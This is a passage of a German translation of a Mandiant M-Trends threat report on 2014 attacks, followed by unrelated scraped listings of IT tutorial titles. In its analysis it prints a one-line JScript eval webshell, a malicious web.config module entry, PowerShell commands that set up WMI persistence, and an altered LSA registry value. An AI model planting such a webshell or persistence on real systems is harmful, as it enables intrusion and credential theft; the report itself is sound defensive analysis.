14 M-Trends Ein Bericht von der Cyberfront Empfehlungen Der in der Fallstudie beschriebene Angriff wäre so in Europa nicht möglich, doch auch hier rollt eine regelrechte Lawine von Angriffen auf Online-Händler und andere Unternehmen zu, die Online-Transaktionen abwickeln. Sie können nicht jeden Angriff abwehren, doch die folgenden Maßnahmen erschweren es Angreifern, in Ihre Umgebung einzudringen und diese auszuspionieren. Mit den richtigen Tools und einem wachsamen Sicherheitsteam können Sie den Verlauf eines Angriffs verlangsa men. Dadurch gewinnen Sie Zeit, um den Angriff aufzudecken, zu untersuchen und zu reagieren, bevor der Angreifer sein Ziel erreicht hat. Sicherer Fernzugriff Analysieren Sie, mit welchen Methoden Ihre Angestellten, externe Mitarbeiter und Zulieferer per Fernzugriff auf Ihre Infrastruktur zugreifen. Bemühen Sie sich, die Anzahl der verfügbaren Zugriffsmethoden, die Anzahl der autori sierten Nutzer und alle anderen Aspekte des Fernzugriffs auf ein kontrollierbares Maß einzuschränken. Legen Sie Richtlinien für starke Kennwörter fest und stellen Sie alle Zugriffsmethoden auf Zwei-Faktor-Authentifizierung um. Durchsuchen Sie die Logdateien für den Fernzugriff kontinuierlich nach Anzeichen verdächtiger Aktivitäten. Sicherer Zugang zur PCI- DSS-Umgebung Schotten Sie Ihre Umgebung für Zahlungen gemäß dem Payment Card Industry Data Security Standard (PCI DSS) vom Rest Ihres Intranets ab. Der Zugang zu Systemen in der PCI-DSS- Umgebung sollte nur über einen von einem siche ren Jumpserver kontrollierten Tunnel möglich sein. Damit befinden sich Ihre POS- Terminals effektiv in einem Hochsicherheitsbereich. Der Zugriff auf den Jumpserver sollte mit Zwei-Faktor-Authentifzierung gesichert sein. Trennen Sie die Verkaufsdomäne nach Möglichkeit vom Rest des Intranets ab, um die Anzahl der möglichen Einfallstore für diese Domäne zu minimieren. Als zusätzliche Sicherheitsmaßnahme sollte der Aufbau von Netzwerkverbindungen aus der Verkaufsdomäne auf Verbindungen zu einer genehmigten Liste geprüfter IP- Adressen beschränkt werden, die für den Geschäftsablauf erforderlich sind. Whitelist von Anwendungen für kritische Ressourcen Um das Risiko einer Malware-Infektion sicherheitskritischer Systeme zu minimieren, sollten auf diesen Systemen nur Anwendungen ausgeführt werden dürfen, die sich auf einer Whitelist geprüfter und genehmigter Anwendungen befinden. Als sicherheitskritisch sollten alle Jumpserver, Domänencontroller und sämtliche Systeme gelten, auf denen Kreditkartendaten verarbeitet werden. Management privilegierter Konten Privilegierte Konten sind für Angreifer besonders interessant, darunter das des Systemadministrators und des Domänenadministrators sowie Dienstkonten. Halten Sie die Anzahl privilegierter Konten so niedrig wie möglich. Sorgen Sie dafür, dass die Systemadministratorkonten für verschiedene Systeme unterschiedliche Kennwörter haben. Erwägen Sie den Einsatz einer Kennwortverwaltung zur Unterstützung Ihrer Systemadministratoren bei der Verwaltung zahlreicher verschiedener Kennwörter. Manche dieser Tools können Kennwörter automatisch nach jeder Nutzung ändern, um das Knacken privilegierter Konten zusätzlich zu erschweren. Fazit : Wo Geld ist, sind auch Kriminelle nicht weit. Einzelhändler gehören schon seit Langem zu den bevorzugten Zielen von Internetkriminellen. Daran hat sich auch 2014 nichts geändert. Die Angreifer nutzten zwar einige neue Angriffsma schen und das Medieninteresse an ihren Aktivitäten stieg, doch ihr Modus Operandi hat sich im Vergleich zu den Vorjahren nicht grundlegend geändert. 12

15 Trend Nr. 3: Raffiniertere Angriffsabläufe Die meisten von uns untersuchten Vorfälle folgen demselben Schema. Wir nennen dies den Lebenszyklus eines Angriffs. Es ist eine Art Wettrüsten: Sicherheitsteams implementieren neue Sicherheitsmaßnahmen und Angreifer finden Wege, um diese Maßnahmen zu umgehen. Das blieb auch 2014 so. Wir untersuchten mehr Vorfälle, bei denen Angreifer das VPN des Opfers hackten, um sich dauerhaften Zugang zu seiner Infrastruktur zu verschaffen. Zudem beobachteten wir clevere neue Tricks, um unentdeckt zu bleiben, sowie neue Tools und Methoden zum Stehlen von Anmeldedaten und Ausspionieren gehackter Umgebungen. Hacken von VPN Ein Hacker, der sich Zugriff auf das VPN seines Opfers verschaffen kann, hat zwei große Vorteile. Erstens hat er dadurch dauerhaft Zugang zur gehackten Infrastruktur, ohne Backdoors einrichten zu müssen. Zweitens kann er privile gierte Nutzer nachahmen, um unauffällig zu bleiben. Wir hatten bereits in früheren Jahren beobachtet, dass manche Angreifergruppen gezielt VPN- Ressourcen und -Anmeldedaten ins Visier nehmen, sobald sie in ein Netzwerk eingedrungen sind. Doch 2014 wurde ein neuer Rekord gesetzt: Wir sahen mehr Fälle, in denen Angreifer Zugang zum VPN ihres Opfer erlangten, als je zuvor. Bei den meisten dieser Angriffe wurde eine der folgenden beiden Methoden genutzt: Ein-Faktor-Authentifizierung: Wo nur ein Benutzername und Kennwort erforderlich waren, um auf das VPN zuzugreifen, nutzten die Angreifer Anmeldedaten, die sie von einem gehackten Computer oder der gehackten Active-Directory-Domain gestohlen hatten. Zertifikatsbasierte Zwei-Faktor-Authentifizierung: Wo das VPN des Opfers ein benutzerspezifisches digitales Zertifikat als zweiten Authentifizierungsfaktor verlangte, nutzten Angreifer gängige Tools wie Mimikatz, um diese Zertifikate von gehackten Benutzercomputern zu extrahieren. In einigen Fällen gelang es den Angreifern auch, VPN-Zertifikate abzufangen, die über unsichere Kommunikationskanäle an ihre legitimen Eigentümer geschickt wurden, beispielsweise als Anhang einer unver schlüsselten oder über eine offene Netzwerkfreigabe. In seltenen Fällen nutzten Angreifer Methoden, mit denen die VPN-Authentifizierung komplett umgangen werden konnte. Ein solches Beispiel war Heartbleed, eine Schwachstelle in der Erweiterung Heartbeat des Protokolls Transport Layer Security (TLS), die im April 2014 Schlagzeilen machte. Angreifer konnten betroffene Systeme und Geräte dazu bringen, bei jeder Abfrage bis zu 64 Kilobyte Daten aus dem Systemspeicher preiszugeben. Forscher bezweifelten zunächst, dass mit dieser Methode tatsächlich sensible Daten wie Verschlüsselungsschlüssel oder Anmeldedaten von echten Systemen gestohlen werden konnten. Die schlimmsten Befürchtungen erwiesen sich jedoch als zutreffend. Wenige Wochen nach Bekanntwerden von Heartbleed untersuchten wir einen Fall, in dem der Angreifer diese Schwachstelle in einem VPN-Gerät ausnutzte, um die authentifizierten Sitzungen autorisierter Nutzer zu übernehmen und sich völlig ohne Anmeldedaten Zugang zum VPN zu verschaffen. In den folgenden Wochen nutzten Angreifer Heartbleed, um in die VPN-Infrastrukturen weiterer Opfer einzudringen. Bessere Tarnung für Malware Die Malwareerkennung ist mit einem ständigen Wettrüsten zwischen Angreifern und Verteidigern vergleichbar. Das bestätigte sich auch 2014 wieder. Angreifer fanden mehrere neue Methoden, um ihre Aktionen zu verschleiern und Malware auf infizierten Systemen zu verbergen. 13

16 M-Trends Ein Bericht von der Cyberfront Wenn Schutzmaßnahmen weiterentwickelt werden, passen Angreifer sich an und finden neue Angriffsmethoden. Im Jahr 2014 beobachteten wir auf jeder Etappe des Angriffs-Lebenszyklus neue Methoden. Im Folgenden stellen wir einige der Ergebnisse vor. Hacken von VPN Mandiant beobachtete 2014 eine Rekordzahl von Fällen, in denen Angreifer sich Zugang zum VPN ihres Opfers verschafften. Verstecken von Webshells Angreifer fanden auch 2014 wieder neue Maschen zum Einschleusen und Verstecken webbasierter Malware. Unter den von Mandiant beobachteten Methoden waren: Installieren schädlicher Shells auf Servern mit SSL-Verschlüsselung, um die Netzwerküberwachung zu umgehen, Einbetten einer einzigen Shellcode-Zeile mit dem Kommando eval in eine seriöse Website, Ändern von Serverkonfigurationsdateien zum Laden schädlicher DLLs. Schädliche Sicherheitspakete Angreifer nutzten die Windows unentdeckt bleiben Security Package Extensibility aus, um Backdoors und Kennwortlogger zu installieren. Einsatz von WMI und Power- Shell Angreifer nutzen zunehmend WMI und PowerShell, zwei leistungsstarke Windows-Komponenten, um dauerhaft Zugang zu einer Infrastruktur zu erhalten, diese auszuspionieren und Daten zu stehlen. weitere Systeme infizieren Eindringen Fuß fassen Privilegien ausweiten Umgebung ausspionieren Ziel erreicht Unverschlüsselte Kennwörter Angreifer nutzten neu kompilierte Varianten des Tools Mimikatz, um unverschlüsselte Kennwörter aus dem Arbeitsspeicher zu stehlen, ohne von Antivirensoftware entdeckt zu werden. Kerberos-Angriffe Nachdem sie sich die Zugriffsrechte eines Domänenadministrators verschafft hatten, konnten Angreifer sich mit dem sogenannten Kerberos Golden Ticket Zugang zu beliebigen anderen privilegierten Konten verschaffen selbst nachdem alle Kennwörter in der Domäne geändert worden waren. Abbildung 4: Neue Angriffsmethoden, die Mandiant bei Untersuchungen beobachtete Bessere Verstecke für Webshells Webbasierte Backdoors, die sogenannten Webshells, sind ein mindestens zehn Jahre alter Malwaretyp. Dank neuer Methoden bleiben sie bei netzwerk- und hostbasierten Malwarescans unentdeckt und gehören weiterhin zu den bevorzugten Tools für gezielte Angriffe. In mehreren von uns untersuchten Fällen hatten Angreifer ihre Webshell auf einem Server mit SSL- Verschlüsselung (Secure Socket Layer) installiert. Dadurch wurden alle mit der Backdoor ausgetauschten Daten mit dem privaten Schlüssel des Servers verschlüsselt. Da die Opfer ihre Netzwerkarchitektur so konfiguriert hatten, dass ihre Sicherheitstools mit SSL verschlüsselte Daten nicht untersuchen konnten, wurden die Aktivitäten des Angreifers nicht erkannt. Wir gehen davon aus, dass diese Angriffsform in Zukunft häufiger genutzt werden wird, da die SSL- Verschlüsselung in immer mehr Unternehmen auf alle öffentlich zugänglichen Bereiche der Website ausgedehnt wird. In einer anderen von uns beobachteten Angriffsform wurde eine Shell in eine Webseite des Zielunternehmens eingeschleust. Diese Shell enthielt das Kommando eval, das per HTTP-Abfrage übermittelten Shellcode ausführt und damit hervorragend als Backdoor geeignet ist. Der Code für eine Shell mit dem Kommando eval kann weniger als 100 Byte lang sein und lässt sich daher leicht in einer größeren HTML-Datei verstecken. Auf normale HTTP-Abfragen reagiert die gehackte Webseite weiterhin wie zuvor. Doch wenn ein Angreifer die Seite mit dem richtigen Parameter aufruft, führt das Kommando eval den übermittelten schädlichen Code aus. Abbildung 5 zeigt den Code für eine Shell mit dem Kommando eval. Dies ist eine vollständige Shell, die so in einer eigenen Webseite implementiert oder in eine andere Website eingebettet werden könnte. Der Angreifer würde seinen schädlichen Code als Parameter p1 der HTTP-Abfrage übermitteln. 14

17 Als letztes Beispiel in diesem Abschnitt möchten wir Sie auf eine besonders raffinierte Masche für die webbasierte Übertragung von Malware aufmerksam machen: Die Angreifer änderten die Konfigurationsdatei web.config der Microsoft Internet Information Services (IIS) auf einem Webserver. Das veranlasste den Server, ein schädliches HTTP- Modul zu laden. Abbildung 6 zeigt eine editierte Version der Änderung in web.config. Mit dieser Änderung wird der Server angewiesen, die Bibliothek BadModule.dll aus einem Shared Modules Directory zu laden und zur Bearbeitung aller folgenden Webabfragen zu nutzen. Die Malware scannte und speicherte die Inhalte aller an den Server gerichteten Webabfragen, einschließlich aller von Benutzern übermittelten Anmeldedaten. Das in Abbildung 6 gezeigte Beispiel wurde von uns geändert. Der Angreifer gab dem schädlichen Modul den Namen einer echten Microsoft-DLL und änderte den Zeitstempel der Malware und der Konfigurationsdatei, um seine Spuren zu verwischen. Dauerhafter Zugang mit WMI Die Windows-Verwaltungsinstrumentation (Windows Management Instrumentation, WMI), eine Kernkomponente des Betriebssystems Windows, enthält ein breites Spektrum an Funktionen und Benutzer oberflächen für die Systemverwaltung. Anwendungen und Skriptsprachen wie PowerShell und VBScript können die WMI nutzen, um Daten zu erfassen, auf Komponenten auf den unteren Ebenen des Betriebssystems zuzugreifen und Befehle auszuführen. Darüber hinaus enthält die WMI ein Ereignisframework, das die Ausführung einer vom Benutzer angegebenen Anwendung veranlassen kann, wenn der Status eines bestimmten Objekts sich ändert. Anstelle einer seriösen Anwendung ließen die von uns beobachteten Angreifer Malware ausführen. In vergangenen Jahren hatten wir nur wenige WMIbasierte Angriffe beobachtet. Das lag vermutlich daran, dass die Nutzung von WMI recht kompliziert ist und den meisten Angreifern einfachere Methoden ausreichten, um in einer gehackten Umgebung unentdeckt zu bleiben. Im Jahr 2014 beobachteten wir jedoch mehrere Angreifergruppen, die WMI für diesen Zweck einsetzten. Für die von uns beobachtete Methode erstellten die Angreifer drei WMI-Objekte, in der Regel mit PowerShell: Ereignisfilter: Der Filter ermittelt, ob ein bestimmtes, häufig auftretendes Ereignis eingetreten ist, beispielsweise eine bestimmte Tageszeit oder der Ablauf einer vorgegebenen Anzahl von Sekunden seit dem letzten Systemstart. Ereignisempfänger: Der Empfänger führt ein bestimmtes Skript bzw. einen bestimmten Befehl aus, wenn das Ereignis eintritt. Die meisten der von uns beobachteten Angreifer erstellten befehlszeilenbasierte Ereignisempfänger, die beliebige Befehle und Argumente ausführen konnten, oder auf Active Script basierende Ereignisempfänger, die VBS- Skripte ausführten. Verbindung zwischen Filter und Empfänger: Die Verbindung sorgt dafür, dass ein bestimmter Empfänger aufgerufen wird, wenn das in einem Filter spezifizierte Ereignis eintritt. Abbildung 8 zeigt ein Beispiel für einen PowerShell- Befehl, der einen befehlszeilenbasierten Ereignisempfänger erstellt. Dieser Empfänger führt powershell.exe mit einem in Base64-codierten String als Argument aus. <%@ Page Language= Jscript %><%eval(request.item[ p1 ], unsafe );%> Abbildung 5: Beispiel einer Webshell mit eval <!--HTTP Modules --> <modules> <add type= Microsoft.Exchange.Clients.BadModule name= BadModule /> </modules> Abbildung 6: Auszug aus der gehackten Datei web.config 15

18 M-Trends Ein Bericht von der Cyberfront 1 Mit PowerShell-Befehlen erstellt der Angreifer drei Ereignisobjekte in WMI: einen Empfänger, der einen Befehl oder ein Skript ausführt, einen Filter, der das System auf eine häufig auftretende Situation überprüft, und eine Verbindung zwischen dem Filter und dem Empfänger. WMI-Namespace (root\subscription) Set-WmiInstance Ereignisempfänger Führe dieses Skript/ diesen Befehl aus Ereignisfilter Frage nach, ob dieses Ereignis eingetreten ist Verbindung zwischen Filter und Empfänger Nutze diesen Filter, um den Empfänger aufzurufen. WMI testet regelmäßig, ob das im Ereignisfilter spezifizierte Ereignis eingetreten ist. In 2 diesem Beispiel wird die Bedingung täglich um 8.05 Uhr erfüllt. SELECT * FROM InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_LocalTime' AND TargetInstance.Hour = 08 AND TargetInstance.Minute = 05 GROUP WITHIN 60 3 Wenn das im Filter spezifizierte Ereignis eintritt, ruft WMI automatisch den mit diesem Filter verbundenen Ereignisempfänger auf. Das Beispiel zeigt einen Teil eines befehlszeilenbasierten Ereignisempfängers, der PowerShell mit zusätzlicher Malware ausführt, die vom Angreifer als Base64-codierter Parameter bereitgestellt wird. CommandLineTemplate="C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe NonInteractive enc SQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAALQBDAG8AbQBwAHUAdABl..." Abbildung 7: So verschafften Angreifer sich mit WMI dauerhaften Zugriff 16

19 Der String könnte zusätzlichen PowerShell-Code enthalten, beispielsweise ein einfaches Download- Tool oder eine Backdoor, und den Angreifern so das Installieren einer Skriptdatei auf der Festplatte ersparen. Wenn dieser Empfänger mit einem geeigneten Ereignisfilter verbunden wäre, könnte er wiederholt ausgeführt werden. WMI-basierte Methoden für den langfristigen Zugriff auf eine gehackte Infrastruktur sind bei einer forensischen Analyse nur schwer zu erkennen, da die Angreifer Ereignisfilter und -empfänger auf eine m System definieren und diese mithilfe von PowerShell-Befehlen auf demselben oder einem anderen System ausführen können. Im Gegensatz zu vielen anderen Methoden für den Erhalt eines dauerhaften Zugriffs hinterlässt dies auch keine Spuren in der Registry. Die Objekte befinden sich im WMI-Repository objects.data, einer komplexen Datenbank auf der Festplatte, die sich nicht leicht auf schädliche Objekte durchsuchen lässt. Darüber hinaus überprüft Windows neu erstellte oder aktivierte Ereignisfilter und -empfänger nur, wenn die Protokollierung auf der Debug-Ebene aktiviert ist. Dabei wird jedoch eine so hohe Anzahl von Ereignissen aufgezeichnet, dass dies nicht die Standardoption ist und die langfristige Nutzung nicht empfohlen wird. 5 Schädliche Sicherheitsmodule Wir haben mehrere Fälle untersucht, in denen Angreifer Sicherheitsmodule in der lokalen Sicherheitsautorität (Windows Local Security Authority, LSA) ausnutzten, um automatisch und unbemerkt Malware herunterzuladen. Sicher heitsmodule sind DLL-Dateien, die unter ver schiedenen Werten unter dem Registrierungs schlüssel HKLM\SYSTEM\ CurrentControlSet\Control\Lsa konfiguriert und beim Systemstart von der LSA geladen werden. Jeder dieser Werte enthält eine Liste von Dateinamen (ohne die Dateierweiterung), die von %SYSTEM- ROOT%\system32\ zu laden sind. Da LSA-Module automatisch von LSASS.EXE geladen werden, kann ein Angreifer mit Administratorrechten diese Liste erweitern oder ändern, um bei jedem Systemstart schädliche DLLs zu laden. In einem von uns 2014 untersuchten Fall änderte der Angreifer den Wert von Security Packages, um sicherzustellen, dass das zum Herunterladen genutzte Tool der aus mehreren Komponenten bestehenden Backdoor tspkgex.dll auf dem System verblieb. 6 Abbildung 9 zeigt den geänderten Wert. Diese Änderung veranlasst LSASS.EXE, bei jedem Systemstart C:\WINDOWS\system32\tspkgEx.dll zu laden. Set-WmiInstance -Namespace root\subscription -Class CommandLineEventConsumer name= EvilWMI ;CommandLineTemplate= C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe enc SQBuAHYAbwBrAGUALQBDAG8AG8AbQ...<SNIP> ;RunInteractively= false } Abbildung 8: Auszug aus einem PowerShell-Befehl zum Erstellen eines WMI-Empfängers SECURITY PACKAGES (unverändert): kerberos msv1_0 schannel wdigest tspkg pku2u SECURITY PACKAGES (geändert): kerberos msv1_0 schannel wdigest tspkg pku2u tspkgex Abbildung 9: Geänderte HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages, die Malware lädt 5 Auf der Mandiant-Konferenz MIRcon 2014 wurden Vorträge zu den Themen WMI und PowerShell gehalten, die diese Methoden ausführlicher beschrieben. Die Vorträge enthielten Fallstudien und Ratschläge für das Aufdecken und die forensische Analyse. Die Präsentationen sind unter mandiant.com/ee/library/mircon2014/mircon_2014_ir_track_there%27s_something_about_wmi.pdf und verfügbar. 6 DLL-Name von uns geändert. 17

20 M-Trends Ein Bericht von der Cyberfront In fast allen von uns untersuchten Fällen wurde Mimikatz von der Antivirensoftware des Opfers weder erkannt noch abgewehrt, obwohl dieses Tool weit verbreitet und sehr bekannt ist. Die meisten Angreifer änderten den Quellcode leicht oder kompilierten ihn einfach nur neu, um Antivirensoftware zu umgehen. Da LSA erweiterbar ist, kann es auch um speziell erstell te Module erweitert werden, die beim Login die Anmeldedaten des Benutzers über prüfen. Ein schädliches Sicherheitsmodul kann diese Funktion missbrauchen, um bei Anmeldeversuchen unverschlüsselte Kennwörter abzufangen. Wir untersuchten 2014 einen gezielten Angriff, bei dem der Angreifer Malware für genau diesen Zweck als Sicherheitsmodul lud. Das weit verbreitete Toolkit Mimikatz 7 enthält ebenfalls ein Sicherheitsmodul zum Stehlen von Kennwörtern, mimilib.ssp. 8 Tools und Tricks für den Kennwortdiebstahl Tools zum Stehlen von Anmeldedaten sind auf dem Schwarzmarkt inzwischen so weit verbreitet, dass das Entwenden von Kennwörtern und das Erlangen von Zugriffsrechten in Windows-Umgebungen deutlich einfacher sind als früher. Bei gezielten Angriffen kam 2014 meist eine der beiden folgenden Methoden zum Einsatz: Pass the Hash, also die Anmeldung mit einem gestohlenen NTLM-Hashwert, ohne diesen zu knacken, Stehlen unverschlüsselter Kennwörter aus dem Arbeitsspeicher mit Mimikatz. In Windows Server 2012 R2 und Windows 8.1 hat Microsoft die Wirksamkeit dieser Methoden eingeschränkt, völlig unmöglich sind sie dadurch jedoch noch immer nicht. Die meisten Kunden, mit denen wir im vergangenen Jahr zusammenarbeiteten, nutzten außerdem noch Domänen mit Windows Server 2008 und Endpunkte mit Windows 7. Pass the Hash ist daher eine bewährte und weiterhin erfolg versprechende Methode, insbesondere wenn mehrere Systeme in einer Umgebung dasselbe Administratorkennwort haben. Mimikatz geht einen Schritt weiter: Es stiehlt unverschlüsselte Windows-Kennwörter, die vom System im Arbeitsspeicher abgelegt wurden, um verschiedene Formen von Single-Sign-On zu unterstützen. Auf dem Computer eines Mitarbeiters sind die Auswirkungen eines solchen Angriffs wahrscheinlich auf den Diebstahl des Domänenkennworts dieses Mitarbeiters begrenzt. Auf einem gemein sam genutzten Server, auf dem viele Benutzer sich mit dem Remote Desktop Protocol (RDP), dem Tool PsExec oder anderen Methoden interaktiv anmelden, könnten dagegen potenziell sehr viele Kennwörter gestohlen werden. Die Opfer eines solchen Angriffs sind meist überrascht, wie schnell ein Angreifer eine ganze Domäne in Active Directory unter seine Kontrolle bringen kann, nachdem er sich Zugang zu einigen wenigen Systemen verschafft hat. In fast allen von uns untersuchten Fällen wurde Mimikatz von der Antivirensoftware des Opfers weder erkannt noch abgewehrt, obwohl dieses Tool weit verbreitet und sehr bekannt ist. Die meisten Angreifer änderten den Quellcode leicht oder kompilierten ihn einfach nur neu, um Antivirensoftware zu umgehen. Manche nutzten auch Variationen wie das PowerShell-Skript Invoke-Mimikatz, das vollständig im Arbeitsspeicher ausgeführt werden kann. Außerdem beobachteten wir 2014 mehrere neue Angriffsmethoden, die auf den Authentifizierungsmechanismus Kerberos abzielten, der in modernen Windows-Domänen standardmäßig verwendet wird. Die Mimikatz-Masche Golden Ticket ist vielleicht die gefährlichste und berüchtigtste dieser Methoden. Mit ihr kann ein Angreifer, der einen Domänencontroller gehackt hat, ein Kerberos- Ticket erstellen, das das Zuweisen beliebiger Zugriffsrechte an andere Benutzer erlaubt Auf der Mandiant-Konferenz MIRcon 2014 präsentierte Matt Graeber weitere Untersuchungsergebnisse zu schädlichen Sicherheitsmodulen sowie Hinweise zu deren Aufdeckung und Abwehr. Diese Präsentation ist unter Analysis_of_Malicious_SSP.pdf verfügbar. 18

Step by Step Webserver unter Windows Server 2003. von Christian Bartl

Step by Step Webserver unter Windows Server 2003. von Christian Bartl Step by Step Webserver unter Windows Server 2003 von Webserver unter Windows Server 2003 Um den WWW-Server-Dienst IIS (Internet Information Service) zu nutzen muss dieser zunächst installiert werden (wird

Mehr

In 15 einfachen Schritten zum mobilen PC mit Paragon Drive Copy 10 und Microsoft Windows Virtual PC

In 15 einfachen Schritten zum mobilen PC mit Paragon Drive Copy 10 und Microsoft Windows Virtual PC PARAGON Technologie GmbH, Systemprogrammierung Heinrich-von-Stephan-Str. 5c 79100 Freiburg, Germany Tel. +49 (0) 761 59018201 Fax +49 (0) 761 59018130 Internet www.paragon-software.com Email sales@paragon-software.com

Mehr

SANDBOXIE konfigurieren

SANDBOXIE konfigurieren SANDBOXIE konfigurieren für Webbrowser und E-Mail-Programme Dies ist eine kurze Anleitung für die grundlegenden folgender Programme: Webbrowser: Internet Explorer, Mozilla Firefox und Opera E-Mail-Programme:

Mehr

Er musste so eingerichtet werden, dass das D-Laufwerk auf das E-Laufwerk gespiegelt

Er musste so eingerichtet werden, dass das D-Laufwerk auf das E-Laufwerk gespiegelt Inhaltsverzeichnis Aufgabe... 1 Allgemein... 1 Active Directory... 1 Konfiguration... 2 Benutzer erstellen... 3 Eigenes Verzeichnis erstellen... 3 Benutzerkonto erstellen... 3 Profil einrichten... 5 Berechtigungen

Mehr

Folgende Einstellungen sind notwendig, damit die Kommunikation zwischen Server und Client funktioniert:

Folgende Einstellungen sind notwendig, damit die Kommunikation zwischen Server und Client funktioniert: Firewall für Lexware professional konfigurieren Inhaltsverzeichnis: 1. Allgemein... 1 2. Einstellungen... 1 3. Windows XP SP2 und Windows 2003 Server SP1 Firewall...1 4. Bitdefender 9... 5 5. Norton Personal

Mehr

Einrichtung des Cisco VPN Clients (IPSEC) in Windows7

Einrichtung des Cisco VPN Clients (IPSEC) in Windows7 Einrichtung des Cisco VPN Clients (IPSEC) in Windows7 Diese Verbindung muss einmalig eingerichtet werden und wird benötigt, um den Zugriff vom privaten Rechner oder der Workstation im Home Office über

Mehr

TeamSpeak3 Einrichten

TeamSpeak3 Einrichten TeamSpeak3 Einrichten Version 1.0.3 24. April 2012 StreamPlus UG Es ist untersagt dieses Dokument ohne eine schriftliche Genehmigung der StreamPlus UG vollständig oder auszugsweise zu reproduzieren, vervielfältigen

Mehr

Handbuch. timecard Connector 1.0.0. Version: 1.0.0. REINER SCT Kartengeräte GmbH & Co. KG Goethestr. 14 78120 Furtwangen

Handbuch. timecard Connector 1.0.0. Version: 1.0.0. REINER SCT Kartengeräte GmbH & Co. KG Goethestr. 14 78120 Furtwangen Handbuch timecard Connector 1.0.0 Version: 1.0.0 REINER SCT Kartengeräte GmbH & Co. KG Goethestr. 14 78120 Furtwangen Furtwangen, den 18.11.2011 Inhaltsverzeichnis Seite 1 Einführung... 3 2 Systemvoraussetzungen...

Mehr

Einrichtung eines VPN-Zugangs

Einrichtung eines VPN-Zugangs Einrichtung eines VPN-Zugangs Einleitung Die nachfolgende Anleitung zeigt die Einrichtung eines VPN-Zugangs zum Netzwerk des Unternehmensverbundes Evangelisches Johannesstift. Diese Anleitung ist auf Basis

Mehr

Virtual Channel installieren

Virtual Channel installieren Virtual Channel installieren Inhaltsverzeichnis 1. Voreinstellungen... 3 2. Virtual Channel herunterladen... 3 3. Virtual Channel konfigurieren... 4 4. Ausdruck... 6 5. Tipps und Tricks... 7 Sorba EDV

Mehr

Datensicherung. Beschreibung der Datensicherung

Datensicherung. Beschreibung der Datensicherung Datensicherung Mit dem Datensicherungsprogramm können Sie Ihre persönlichen Daten problemlos Sichern. Es ist möglich eine komplette Datensicherung durchzuführen, aber auch nur die neuen und geänderten

Mehr

Windows Server 2008 (R2): Anwendungsplattform

Windows Server 2008 (R2): Anwendungsplattform Mag. Christian Zahler, Stand: August 2011 13 14 Mag. Christian Zahler, Stand: August 2011 Mag. Christian Zahler, Stand: August 2011 15 1.5.2 Remotedesktop-Webverbindung Windows Server 2008 (R2): Anwendungsplattform

Mehr

Live Update (Auto Update)

Live Update (Auto Update) Live Update (Auto Update) Mit der Version 44.20.00 wurde moveit@iss+ um die Funktion des Live Updates (in anderen Programmen auch als Auto Update bekannt) für Programm Updates erweitert. Damit Sie auch

Mehr

2 Die Terminaldienste Prüfungsanforderungen von Microsoft: Lernziele:

2 Die Terminaldienste Prüfungsanforderungen von Microsoft: Lernziele: 2 Die Terminaldienste Prüfungsanforderungen von Microsoft: Configuring Terminal Services o Configure Windows Server 2008 Terminal Services RemoteApp (TS RemoteApp) o Configure Terminal Services Gateway

Mehr

icloud nicht neu, aber doch irgendwie anders

icloud nicht neu, aber doch irgendwie anders Kapitel 6 In diesem Kapitel zeigen wir Ihnen, welche Dienste die icloud beim Abgleich von Dateien und Informationen anbietet. Sie lernen icloud Drive kennen, den Fotostream, den icloud-schlüsselbund und

Mehr

Anleitung zur Erstellung einer Batchdatei. - für das automatisierte Verbinden mit Netzlaufwerken beim Systemstart -

Anleitung zur Erstellung einer Batchdatei. - für das automatisierte Verbinden mit Netzlaufwerken beim Systemstart - Anleitung zur Erstellung einer Batchdatei - für das automatisierte Verbinden mit Netzlaufwerken beim Systemstart - Mögliche Anwendungen für Batchdateien: - Mit jedem Systemstart vordefinierte Netzlaufwerke

Mehr

Tapps mit XP-Mode unter Windows 7 64 bit (V2.0)

Tapps mit XP-Mode unter Windows 7 64 bit (V2.0) Tapps mit XP-Mode unter Windows 7 64 bit (V2.0) 1 Einleitung... 2 2 Download und Installation... 3 2.1 Installation von WindowsXPMode_de-de.exe... 4 2.2 Installation von Windows6.1-KB958559-x64.msu...

Mehr

SafeRun-Modus: Die Sichere Umgebung für die Ausführung von Programmen

SafeRun-Modus: Die Sichere Umgebung für die Ausführung von Programmen SafeRun-Modus: Die Sichere Umgebung für die Ausführung von Programmen Um die maximale Sicherheit für das Betriebssystem und Ihre persönlichen Daten zu gewährleisten, können Sie Programme von Drittherstellern

Mehr

System-Update Addendum

System-Update Addendum System-Update Addendum System-Update ist ein Druckserverdienst, der die Systemsoftware auf dem Druckserver mit den neuesten Sicherheitsupdates von Microsoft aktuell hält. Er wird auf dem Druckserver im

Mehr

Lizenzierung von Windows Server 2012

Lizenzierung von Windows Server 2012 Lizenzierung von Windows Server 2012 Das Lizenzmodell von Windows Server 2012 Datacenter und Standard besteht aus zwei Komponenten: Prozessorlizenzen zur Lizenzierung der Serversoftware und CALs zur Lizenzierung

Mehr

In 12 Schritten zum mobilen PC mit Paragon Drive Copy 11 und Microsoft Windows Virtual PC

In 12 Schritten zum mobilen PC mit Paragon Drive Copy 11 und Microsoft Windows Virtual PC PARAGON Technologie GmbH, Systemprogrammierung Heinrich-von-Stephan-Str. 5c 79100 Freiburg, Germany Tel. +49 (0) 761 59018201 Fax +49 (0) 761 59018130 Internet www.paragon-software.com Email sales@paragon-software.com

Mehr

Tutorial - www.root13.de

Tutorial - www.root13.de Tutorial - www.root13.de Netzwerk unter Linux einrichten (SuSE 7.0 oder höher) Inhaltsverzeichnis: - Netzwerk einrichten - Apache einrichten - einfaches FTP einrichten - GRUB einrichten Seite 1 Netzwerk

Mehr

Lizenzen auschecken. Was ist zu tun?

Lizenzen auschecken. Was ist zu tun? Use case Lizenzen auschecken Ihr Unternehmen hat eine Netzwerk-Commuterlizenz mit beispielsweise 4 Lizenzen. Am Freitag wollen Sie Ihren Laptop mit nach Hause nehmen, um dort am Wochenende weiter zu arbeiten.

Mehr

Eigenen WSUS Server mit dem UNI WSUS Server Synchronisieren

Eigenen WSUS Server mit dem UNI WSUS Server Synchronisieren Verwaltungsdirektion Informatikdienste Eigenen WSUS Server mit dem UNI WSUS Server Synchronisieren Inhaltsverzeichnis Einleitung... 3 Installation WSUS Server... 4 Dokumente... 4 Step by Step Installation...

Mehr

